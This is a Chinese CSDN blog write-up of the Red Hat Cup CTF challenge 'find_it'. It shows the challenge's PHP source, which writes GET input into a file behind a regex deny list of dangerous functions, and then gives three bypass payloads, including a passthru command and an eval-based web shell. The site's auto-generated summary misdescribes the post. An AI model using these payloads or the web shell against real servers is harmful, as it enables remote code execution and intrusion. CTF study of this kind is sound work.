红帽杯find_it

本文探讨了PHP基础语法和一个常见的安全问题——代码注入,展示了如何利用<?php ... ?>和文件操作,同时强调了防止恶意输入的重要性。通过实例,读者将理解如何避免mysql_connect漏洞并使用正则表达式检查用户输入。
摘要由CSDN通过智能技术生成

随便坐一坐

<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head>
        <title>Hello worldd!</title>
        <style>
        body {
                background-color: white;
                text-align: center;
                padding: 50px;
                font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
        }

        #logo {
                margin-bottom: 40px;
        }
        </style>
</head>
<body>
        <img id="logo" src="logo.png" />
        <h1><?php echo "Hello My freind!"; ?></h1>
        <?php if($link) { ?>
                <h2>I Can't view my php files?!</h2>
        <?php } else { ?>
                <h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
        <?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
        die("you die");
}
if(strlen($a)>33){
        die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>             

fopen() 函数打开文件或者 URL
fwrite — 写入文件(可安全用于二进制文件)
fread ( resource $handle , int $length ) : string 最多读length个

三种方法随便挑 感觉还是第一个最简单

$a = "<?= passthru('ls'); ?>";
$a = "<?= EVAL($_POST[cmd]); ?>"
$a = "<?= show_source(glob('./*')); ?>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值